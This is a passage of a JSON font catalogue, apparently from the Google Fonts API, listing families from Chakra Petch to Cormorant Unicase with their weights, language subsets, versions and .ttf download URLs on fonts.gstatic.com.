        "300italic": "http://fonts.gstatic.com/s/chakrapetch/v4/cIfnMapbsEk7TDLdtEz1BwkWmpLJQp_A_gMk0izH.ttf",
        "regular": "http://fonts.gstatic.com/s/chakrapetch/v4/cIf6MapbsEk7TDLdtEz1BwkmmKBhSL7Y1Q.ttf",
        "italic": "http://fonts.gstatic.com/s/chakrapetch/v4/cIfkMapbsEk7TDLdtEz1BwkWmqplarvI1R8t.ttf",
        "500": "http://fonts.gstatic.com/s/chakrapetch/v4/cIflMapbsEk7TDLdtEz1BwkebIlFQJXE3AY00g.ttf",
        "500italic": "http://fonts.gstatic.com/s/chakrapetch/v4/cIfnMapbsEk7TDLdtEz1BwkWmpKRQ5_A_gMk0izH.ttf",
        "600": "http://fonts.gstatic.com/s/chakrapetch/v4/cIflMapbsEk7TDLdtEz1BwkeQI5FQJXE3AY00g.ttf",
        "600italic": "http://fonts.gstatic.com/s/chakrapetch/v4/cIfnMapbsEk7TDLdtEz1BwkWmpK9RJ_A_gMk0izH.ttf",
        "700": "http://fonts.gstatic.com/s/chakrapetch/v4/cIflMapbsEk7TDLdtEz1BwkeJI9FQJXE3AY00g.ttf",
        "700italic": "http://fonts.gstatic.com/s/chakrapetch/v4/cIfnMapbsEk7TDLdtEz1BwkWmpLZRZ_A_gMk0izH.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Changa",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "arabic",
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-06-26",
      "files": {
        "200": "http://fonts.gstatic.com/s/changa/v10/2-c79JNi2YuVOUcOarRPgnNGooxCZy2xQjDp9htf1ZM.ttf",
        "300": "http://fonts.gstatic.com/s/changa/v10/2-c79JNi2YuVOUcOarRPgnNGooxCZ_OxQjDp9htf1ZM.ttf",
        "regular": "http://fonts.gstatic.com/s/changa/v10/2-c79JNi2YuVOUcOarRPgnNGooxCZ62xQjDp9htf1ZM.ttf",
        "500": "http://fonts.gstatic.com/s/changa/v10/2-c79JNi2YuVOUcOarRPgnNGooxCZ5-xQjDp9htf1ZM.ttf",
        "600": "http://fonts.gstatic.com/s/changa/v10/2-c79JNi2YuVOUcOarRPgnNGooxCZ3O2QjDp9htf1ZM.ttf",
        "700": "http://fonts.gstatic.com/s/changa/v10/2-c79JNi2YuVOUcOarRPgnNGooxCZ0q2QjDp9htf1ZM.ttf",
        "800": "http://fonts.gstatic.com/s/changa/v10/2-c79JNi2YuVOUcOarRPgnNGooxCZy22QjDp9htf1ZM.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Changa One",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v13",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/changaone/v13/xfu00W3wXn3QLUJXhzq46AbouLfbK64.ttf",
        "italic": "http://fonts.gstatic.com/s/changaone/v13/xfu20W3wXn3QLUJXhzq42ATivJXeO67ISw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Chango",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/chango/v9/2V0cKI0OB5U7WaJyz324TFUaAw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Charm",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/charm/v5/7cHmv4oii5K0MeYvIe804WIo.ttf",
        "700": "http://fonts.gstatic.com/s/charm/v5/7cHrv4oii5K0Md6TDss8yn4hnCci.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Charmonman",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/charmonman/v5/MjQDmiR3vP_nuxDv47jiWJGovLdh6OE.ttf",
        "700": "http://fonts.gstatic.com/s/charmonman/v5/MjQAmiR3vP_nuxDv47jiYC2HmL9K9OhmGnY.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Chathura",
      "variants": [
        "100",
        "300",
        "regular",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "100": "http://fonts.gstatic.com/s/chathura/v6/_gP91R7-rzUuVjim42dEq0SbTvZyuDo.ttf",
        "300": "http://fonts.gstatic.com/s/chathura/v6/_gP81R7-rzUuVjim42eMiWSxYPp7oSNy.ttf",
        "regular": "http://fonts.gstatic.com/s/chathura/v6/_gP71R7-rzUuVjim418goUC5S-Zy.ttf",
        "700": "http://fonts.gstatic.com/s/chathura/v6/_gP81R7-rzUuVjim42ecjmSxYPp7oSNy.ttf",
        "800": "http://fonts.gstatic.com/s/chathura/v6/_gP81R7-rzUuVjim42eAjWSxYPp7oSNy.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Chau Philomene One",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/chauphilomeneone/v10/55xxezRsPtfie1vPY49qzdgSlJiHRQFsnIx7QMISdQ.ttf",
        "italic": "http://fonts.gstatic.com/s/chauphilomeneone/v10/55xzezRsPtfie1vPY49qzdgSlJiHRQFcnoZ_YscCdXQB.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Chela One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/chelaone/v9/6ae-4KC7Uqgdz_JZdPIy31vWNTMwoQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Chelsea Market",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/chelseamarket/v8/BCawqZsHqfr89WNP_IApC8tzKBhlLA4uKkWk.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Chenla",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/chenla/v13/SZc43FDpIKu8WZ9eXxfonUPL6Q.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cherry Cream Soda",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cherrycreamsoda/v11/UMBIrOxBrW6w2FFyi9paG0fdVdRciTd6Cd47DJ7G.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cherry Swash",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cherryswash/v9/i7dNIFByZjaNAMxtZcnfAy58QHi-EwWMbg.ttf",
        "700": "http://fonts.gstatic.com/s/cherryswash/v9/i7dSIFByZjaNAMxtZcnfAy5E_FeaGy6QZ3WfYg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Chewy",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/chewy/v12/uK_94ruUb-k-wk5xIDMfO-ed.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Chicle",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/chicle/v9/lJwG-pw9i2dqU-BDyWKuobYSxw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Chilanka",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "malayalam"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/chilanka/v6/WWXRlj2DZQiMJYaYRrJQI9EAZhTO.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Chivo",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "700",
        "700italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/chivo/v12/va9F4kzIxd1KFrjDY8Z_uqzGQC_-.ttf",
        "300italic": "http://fonts.gstatic.com/s/chivo/v12/va9D4kzIxd1KFrBteUp9sKjkRT_-bF0.ttf",
        "regular": "http://fonts.gstatic.com/s/chivo/v12/va9I4kzIxd1KFoBvS-J3kbDP.ttf",
        "italic": "http://fonts.gstatic.com/s/chivo/v12/va9G4kzIxd1KFrBtQeZVlKDPWTY.ttf",
        "700": "http://fonts.gstatic.com/s/chivo/v12/va9F4kzIxd1KFrjTZMZ_uqzGQC_-.ttf",
        "700italic": "http://fonts.gstatic.com/s/chivo/v12/va9D4kzIxd1KFrBteVp6sKjkRT_-bF0.ttf",
        "900": "http://fonts.gstatic.com/s/chivo/v12/va9F4kzIxd1KFrjrZsZ_uqzGQC_-.ttf",
        "900italic": "http://fonts.gstatic.com/s/chivo/v12/va9D4kzIxd1KFrBteWJ4sKjkRT_-bF0.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Chonburi",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/chonburi/v5/8AtqGs-wOpGRTBq66IWaFr3biAfZ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cinzel",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-08-20",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cinzel/v10/8vIU7ww63mVu7gtR-kwKxNvkNOjw-tbnTYrvDE5ZdqU.ttf",
        "500": "http://fonts.gstatic.com/s/cinzel/v10/8vIU7ww63mVu7gtR-kwKxNvkNOjw-uTnTYrvDE5ZdqU.ttf",
        "600": "http://fonts.gstatic.com/s/cinzel/v10/8vIU7ww63mVu7gtR-kwKxNvkNOjw-gjgTYrvDE5ZdqU.ttf",
        "700": "http://fonts.gstatic.com/s/cinzel/v10/8vIU7ww63mVu7gtR-kwKxNvkNOjw-jHgTYrvDE5ZdqU.ttf",
        "800": "http://fonts.gstatic.com/s/cinzel/v10/8vIU7ww63mVu7gtR-kwKxNvkNOjw-lbgTYrvDE5ZdqU.ttf",
        "900": "http://fonts.gstatic.com/s/cinzel/v10/8vIU7ww63mVu7gtR-kwKxNvkNOjw-n_gTYrvDE5ZdqU.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cinzel Decorative",
      "variants": [
        "regular",
        "700",
        "900"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cinzeldecorative/v9/daaCSScvJGqLYhG8nNt8KPPswUAPnh7URs1LaCyC.ttf",
        "700": "http://fonts.gstatic.com/s/cinzeldecorative/v9/daaHSScvJGqLYhG8nNt8KPPswUAPniZoaelDQzCLlQXE.ttf",
        "900": "http://fonts.gstatic.com/s/cinzeldecorative/v9/daaHSScvJGqLYhG8nNt8KPPswUAPniZQa-lDQzCLlQXE.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Clicker Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/clickerscript/v8/raxkHiKPvt8CMH6ZWP8PdlEq72rY2zqUKafv.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Coda",
      "variants": [
        "regular",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v16",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/coda/v16/SLXHc1jY5nQ8JUIMapaN39I.ttf",
        "800": "http://fonts.gstatic.com/s/coda/v16/SLXIc1jY5nQ8HeIgTp6mw9t1cX8.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Coda Caption",
      "variants": [
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v14",
      "lastModified": "2020-09-02",
      "files": {
        "800": "http://fonts.gstatic.com/s/codacaption/v14/ieVm2YRII2GMY7SyXSoDRiQGqcx6x_-fACIgaw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Codystar",
      "variants": [
        "300",
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/codystar/v8/FwZf7-Q1xVk-40qxOuYsyuyrj0e29bfC.ttf",
        "regular": "http://fonts.gstatic.com/s/codystar/v8/FwZY7-Q1xVk-40qxOt6A4sijpFu_.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Coiny",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "tamil",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/coiny/v6/gyByhwU1K989PXwbElSvO5Tc.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Combo",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/combo/v9/BXRlvF3Jh_fIhg0iBu9y8Hf0.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Comfortaa",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v29",
      "lastModified": "2020-06-26",
      "files": {
        "300": "http://fonts.gstatic.com/s/comfortaa/v29/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4TbMPrQVIT9c2c8.ttf",
        "regular": "http://fonts.gstatic.com/s/comfortaa/v29/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4WjMPrQVIT9c2c8.ttf",
        "500": "http://fonts.gstatic.com/s/comfortaa/v29/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4VrMPrQVIT9c2c8.ttf",
        "600": "http://fonts.gstatic.com/s/comfortaa/v29/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4bbLPrQVIT9c2c8.ttf",
        "700": "http://fonts.gstatic.com/s/comfortaa/v29/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4Y_LPrQVIT9c2c8.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Comic Neue",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/comicneue/v2/4UaErEJDsxBrF37olUeD_wHLwpteLwtHJlc.ttf",
        "300italic": "http://fonts.gstatic.com/s/comicneue/v2/4UaarEJDsxBrF37olUeD96_RTplUKylCNlcw_Q.ttf",
        "regular": "http://fonts.gstatic.com/s/comicneue/v2/4UaHrEJDsxBrF37olUeDx63j5pN1MwI.ttf",
        "italic": "http://fonts.gstatic.com/s/comicneue/v2/4UaFrEJDsxBrF37olUeD96_p4rFwIwJePw.ttf",
        "700": "http://fonts.gstatic.com/s/comicneue/v2/4UaErEJDsxBrF37olUeD_xHMwpteLwtHJlc.ttf",
        "700italic": "http://fonts.gstatic.com/s/comicneue/v2/4UaarEJDsxBrF37olUeD96_RXp5UKylCNlcw_Q.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Coming Soon",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/comingsoon/v12/qWcuB6mzpYL7AJ2VfdQR1u-SUjjzsykh.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Commissioner",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-10-08",
      "files": {
        "100": "http://fonts.gstatic.com/s/commissioner/v1/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Ni-IO9pOXuRoaY.ttf",
        "200": "http://fonts.gstatic.com/s/commissioner/v1/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Fi_IO9pOXuRoaY.ttf",
        "300": "http://fonts.gstatic.com/s/commissioner/v1/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Ia_IO9pOXuRoaY.ttf",
        "regular": "http://fonts.gstatic.com/s/commissioner/v1/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Ni_IO9pOXuRoaY.ttf",
        "500": "http://fonts.gstatic.com/s/commissioner/v1/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Oq_IO9pOXuRoaY.ttf",
        "600": "http://fonts.gstatic.com/s/commissioner/v1/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Aa4IO9pOXuRoaY.ttf",
        "700": "http://fonts.gstatic.com/s/commissioner/v1/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5D-4IO9pOXuRoaY.ttf",
        "800": "http://fonts.gstatic.com/s/commissioner/v1/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Fi4IO9pOXuRoaY.ttf",
        "900": "http://fonts.gstatic.com/s/commissioner/v1/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5HG4IO9pOXuRoaY.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Concert One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/concertone/v11/VEM1Ro9xs5PjtzCu-srDqRTlhv-CuVAQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Condiment",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/condiment/v8/pONk1hggFNmwvXALyH6Sq4n4o1vyCQ.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Content",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/content/v13/zrfl0HLayePhU_AwUaDyIiL0RCg.ttf",
        "700": "http://fonts.gstatic.com/s/content/v13/zrfg0HLayePhU_AwaRzdBirfWCHvkAI.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Contrail One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/contrailone/v10/eLGbP-j_JA-kG0_Zo51noafdZUvt_c092w.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Convergence",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/convergence/v9/rax5HiePvdgXPmmMHcIPYRhasU7Q8Cad.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cookie",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cookie/v12/syky-y18lb0tSbfNlQCT9tPdpw.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Copse",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/copse/v10/11hPGpDKz1rGb0djHkihUb-A.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Corben",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v14",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/corben/v14/LYjDdGzzklQtCMp9oAlEpVs3VQ.ttf",
        "700": "http://fonts.gstatic.com/s/corben/v14/LYjAdGzzklQtCMpFHCZgrXArXN7HWQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cormorant",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v10",
      "lastModified": "2020-09-25",
      "files": {
        "300": "http://fonts.gstatic.com/s/cormorant/v10/H4cgBXOCl9bbnla_nHIiRLmYgoyyYzFzFw.ttf",
        "300italic": "http://fonts.gstatic.com/s/cormorant/v10/H4c-BXOCl9bbnla_nHIq6qMUgIa2QTRjF8ER.ttf",
        "regular": "http://fonts.gstatic.com/s/cormorant/v10/H4clBXOCl9bbnla_nHIa6JG8iqeuag.ttf",
        "italic": "http://fonts.gstatic.com/s/cormorant/v10/H4cjBXOCl9bbnla_nHIq6pu4qKK-aihq.ttf",
        "500": "http://fonts.gstatic.com/s/cormorant/v10/H4cgBXOCl9bbnla_nHIiHLiYgoyyYzFzFw.ttf",
        "500italic": "http://fonts.gstatic.com/s/cormorant/v10/H4c-BXOCl9bbnla_nHIq6qNMgYa2QTRjF8ER.ttf",
        "600": "http://fonts.gstatic.com/s/cormorant/v10/H4cgBXOCl9bbnla_nHIiML-YgoyyYzFzFw.ttf",
        "600italic": "http://fonts.gstatic.com/s/cormorant/v10/H4c-BXOCl9bbnla_nHIq6qNghoa2QTRjF8ER.ttf",
        "700": "http://fonts.gstatic.com/s/cormorant/v10/H4cgBXOCl9bbnla_nHIiVL6YgoyyYzFzFw.ttf",
        "700italic": "http://fonts.gstatic.com/s/cormorant/v10/H4c-BXOCl9bbnla_nHIq6qMEh4a2QTRjF8ER.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cormorant Garamond",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v9",
      "lastModified": "2020-09-25",
      "files": {
        "300": "http://fonts.gstatic.com/s/cormorantgaramond/v9/co3YmX5slCNuHLi8bLeY9MK7whWMhyjQAllvuQWJ5heb_w.ttf",
        "300italic": "http://fonts.gstatic.com/s/cormorantgaramond/v9/co3WmX5slCNuHLi8bLeY9MK7whWMhyjYrEPjuw-NxBKL_y94.ttf",
        "regular": "http://fonts.gstatic.com/s/cormorantgaramond/v9/co3bmX5slCNuHLi8bLeY9MK7whWMhyjornFLsS6V7w.ttf",
        "italic": "http://fonts.gstatic.com/s/cormorantgaramond/v9/co3ZmX5slCNuHLi8bLeY9MK7whWMhyjYrHtPkyuF7w6C.ttf",
        "500": "http://fonts.gstatic.com/s/cormorantgaramond/v9/co3YmX5slCNuHLi8bLeY9MK7whWMhyjQWlhvuQWJ5heb_w.ttf",
        "500italic": "http://fonts.gstatic.com/s/cormorantgaramond/v9/co3WmX5slCNuHLi8bLeY9MK7whWMhyjYrEO7ug-NxBKL_y94.ttf",
        "600": "http://fonts.gstatic.com/s/cormorantgaramond/v9/co3YmX5slCNuHLi8bLeY9MK7whWMhyjQdl9vuQWJ5heb_w.ttf",
        "600italic": "http://fonts.gstatic.com/s/cormorantgaramond/v9/co3WmX5slCNuHLi8bLeY9MK7whWMhyjYrEOXvQ-NxBKL_y94.ttf",
        "700": "http://fonts.gstatic.com/s/cormorantgaramond/v9/co3YmX5slCNuHLi8bLeY9MK7whWMhyjQEl5vuQWJ5heb_w.ttf",
        "700italic": "http://fonts.gstatic.com/s/cormorantgaramond/v9/co3WmX5slCNuHLi8bLeY9MK7whWMhyjYrEPzvA-NxBKL_y94.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cormorant Infant",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v10",
      "lastModified": "2020-09-25",
      "files": {
        "300": "http://fonts.gstatic.com/s/cormorantinfant/v10/HhyIU44g9vKiM1sORYSiWeAsLN9951w3_DMrQqcdJrk.ttf",
        "300italic": "http://fonts.gstatic.com/s/cormorantinfant/v10/HhyKU44g9vKiM1sORYSiWeAsLN997_ItcDEhRoUYNrn_Ig.ttf",
        "regular": "http://fonts.gstatic.com/s/cormorantinfant/v10/HhyPU44g9vKiM1sORYSiWeAsLN993_Af2DsAXq4.ttf",
        "italic": "http://fonts.gstatic.com/s/cormorantinfant/v10/HhyJU44g9vKiM1sORYSiWeAsLN997_IV3BkFTq4EPw.ttf",
        "500": "http://fonts.gstatic.com/s/cormorantinfant/v10/HhyIU44g9vKiM1sORYSiWeAsLN995wQ2_DMrQqcdJrk.ttf",
        "500italic": "http://fonts.gstatic.com/s/cormorantinfant/v10/HhyKU44g9vKiM1sORYSiWeAsLN997_ItKDAhRoUYNrn_Ig.ttf",
        "600": "http://fonts.gstatic.com/s/cormorantinfant/v10/HhyIU44g9vKiM1sORYSiWeAsLN995ygx_DMrQqcdJrk.ttf",
        "600italic": "http://fonts.gstatic.com/s/cormorantinfant/v10/HhyKU44g9vKiM1sORYSiWeAsLN997_ItBDchRoUYNrn_Ig.ttf",
        "700": "http://fonts.gstatic.com/s/cormorantinfant/v10/HhyIU44g9vKiM1sORYSiWeAsLN9950ww_DMrQqcdJrk.ttf",
        "700italic": "http://fonts.gstatic.com/s/cormorantinfant/v10/HhyKU44g9vKiM1sORYSiWeAsLN997_ItYDYhRoUYNrn_Ig.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cormorant SC",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v10",
      "lastModified": "2020-09-25",
      "files": {
        "300": "http://fonts.gstatic.com/s/cormorantsc/v10/0ybmGD4kxqXBmOVLG30OGwsmABIU_R3y8DOWGA.ttf",
        "regular": "http://fonts.gstatic.com/s/cormorantsc/v10/0yb5GD4kxqXBmOVLG30OGwserDow9Tbu-Q.ttf",
        "500": "http://fonts.gstatic.com/s/cormorantsc/v10/0ybmGD4kxqXBmOVLG30OGwsmWBMU_R3y8DOWGA.ttf",
        "600": "http://fonts.gstatic.com/s/cormorantsc/v10/0ybmGD4kxqXBmOVLG30OGwsmdBQU_R3y8DOWGA.ttf",
        "700": "http://fonts.gstatic.com/s/cormorantsc/v10/0ybmGD4kxqXBmOVLG30OGwsmEBUU_R3y8DOWGA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cormorant Unicase",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
